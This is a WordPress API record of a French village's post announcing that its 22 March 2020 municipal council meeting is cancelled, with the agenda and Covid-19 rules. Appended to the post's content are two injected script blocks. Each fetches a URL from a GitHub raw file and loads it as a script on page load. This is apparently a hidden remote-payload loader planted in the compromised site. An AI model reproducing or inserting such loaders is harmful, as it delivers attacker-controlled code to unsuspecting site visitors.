{"id":664,"date":"2020-03-23T17:24:00","date_gmt":"2020-03-23T16:24:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=664"},"modified":"2024-07-29T06:39:32","modified_gmt":"2024-07-29T04:39:32","slug":"annule-conseil-municipal-du-22-mars-2020","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/","title":{"rendered":"ANNULE : Conseil Municipal du 22 mars 2020"},"content":{"rendered":"\n<p>1. Installation du Conseil municipal \u00e9lu lors des \u00e9lections du 15 mars 2020<br>2. Election du Maire<br>3. D\u00e9termination du nombre d\u2019adjoints<br>4. Election des adjoints<br>5. Lecture de la charte de l\u2019\u00e9lu local<\/p>\n\n\n\n<p><em>Dans ce contexte particulier de lutte contre la propagation du Covid-19, les membres du conseil municipal doivent se munir d\u2019une attestation de d\u00e9placement d\u00e9rogatoire (d\u00e9cret 2020-260 du 16 mars 2020).<\/em><\/p>\n\n\n\n<p><em>De m\u00eame, en vertu du d\u00e9cret susvis\u00e9, la s\u00e9ance du conseil municipal se tiendra sans public \u00e0 l\u2019exception du personnel communal et des journalistes.<\/em><\/p>\n\n\n\n<p><em>La circulaire minist\u00e9rielle du 17 mars pr\u00e9cise les gestes barri\u00e8res \u00e0 respecter&nbsp;: distance d\u2019un m\u00e8tre entre les personnes, mise \u00e0 disposition de gel hydroalcoolique, notamment.<\/em><\/p>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>1. Installation du Conseil municipal \u00e9lu lors des \u00e9lections du 15 mars 20202. Election du Maire3. D\u00e9termination du nombre d\u2019adjoints4. Election des adjoints5. Lecture de la charte de l\u2019\u00e9lu local Dans ce contexte particulier de lutte contre la propagation du Covid-19, les membres du conseil municipal doivent se munir d\u2019une attestation de d\u00e9placement d\u00e9rogatoire (d\u00e9cret 2020-260 du 16 mars 2020). De m\u00eame, en vertu du d\u00e9cret susvis\u00e9, la s\u00e9ance du conseil municipal se tiendra sans public \u00e0 l\u2019exception du personnel communal et des journalistes. La circulaire minist\u00e9rielle du 17 mars pr\u00e9cise les gestes barri\u00e8res \u00e0 respecter&nbsp;: distance d\u2019un m\u00e8tre entre les personnes, mise \u00e0 disposition de gel hydroalcoolique, notamment.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-664","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>ANNULE : Conseil Municipal du 22 mars 2020 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ANNULE : Conseil Municipal du 22 mars 2020 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"1. Installation du Conseil municipal \u00e9lu lors des \u00e9lections du 15 mars 20202. Election du Maire3. D\u00e9termination du nombre d\u2019adjoints4. Election des adjoints5. Lecture de la charte de l\u2019\u00e9lu local Dans ce contexte particulier de lutte contre la propagation du Covid-19, les membres du conseil municipal doivent se munir d\u2019une attestation de d\u00e9placement d\u00e9rogatoire (d\u00e9cret 2020-260 du 16 mars 2020). De m\u00eame, en vertu du d\u00e9cret susvis\u00e9, la s\u00e9ance du conseil municipal se tiendra sans public \u00e0 l\u2019exception du personnel communal et des journalistes. La circulaire minist\u00e9rielle du 17 mars pr\u00e9cise les gestes barri\u00e8res \u00e0 respecter&nbsp;: distance d\u2019un m\u00e8tre entre les personnes, mise \u00e0 disposition de gel hydroalcoolique, notamment.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2020-03-23T16:24:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:39:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"ANNULE : Conseil Municipal du 22 mars 2020\",\"datePublished\":\"2020-03-23T16:24:00+00:00\",\"dateModified\":\"2024-07-29T04:39:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/\"},\"wordCount\":122,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/\",\"name\":\"ANNULE : Conseil Municipal du 22 mars 2020 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2020-03-23T16:24:00+00:00\",\"dateModified\":\"2024-07-29T04:39:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/03\\\/23\\\/annule-conseil-municipal-du-22-mars-2020\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ANNULE : Conseil Municipal du 22 mars 2020\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"ANNULE : Conseil Municipal du 22 mars 2020 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/","og_locale":"fr_FR","og_type":"article","og_title":"ANNULE : Conseil Municipal du 22 mars 2020 * Haverskerque, 100% Nature !*","og_description":"1. Installation du Conseil municipal \u00e9lu lors des \u00e9lections du 15 mars 20202. Election du Maire3. D\u00e9termination du nombre d\u2019adjoints4. Election des adjoints5. Lecture de la charte de l\u2019\u00e9lu local Dans ce contexte particulier de lutte contre la propagation du Covid-19, les membres du conseil municipal doivent se munir d\u2019une attestation de d\u00e9placement d\u00e9rogatoire (d\u00e9cret 2020-260 du 16 mars 2020). De m\u00eame, en vertu du d\u00e9cret susvis\u00e9, la s\u00e9ance du conseil municipal se tiendra sans public \u00e0 l\u2019exception du personnel communal et des journalistes. La circulaire minist\u00e9rielle du 17 mars pr\u00e9cise les gestes barri\u00e8res \u00e0 respecter&nbsp;: distance d\u2019un m\u00e8tre entre les personnes, mise \u00e0 disposition de gel hydroalcoolique, notamment.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2020-03-23T16:24:00+00:00","article_modified_time":"2024-07-29T04:39:32+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"ANNULE : Conseil Municipal du 22 mars 2020","datePublished":"2020-03-23T16:24:00+00:00","dateModified":"2024-07-29T04:39:32+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/"},"wordCount":122,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/","name":"ANNULE : Conseil Municipal du 22 mars 2020 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2020-03-23T16:24:00+00:00","dateModified":"2024-07-29T04:39:32+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/03\/23\/annule-conseil-municipal-du-22-mars-2020\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"ANNULE : Conseil Municipal du 22 mars 2020"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/664","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=664"}],"version-history":[{"count":2,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/664\/revisions"}],"predecessor-version":[{"id":8318,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/664\/revisions\/8318"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=664"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=664"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=664"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}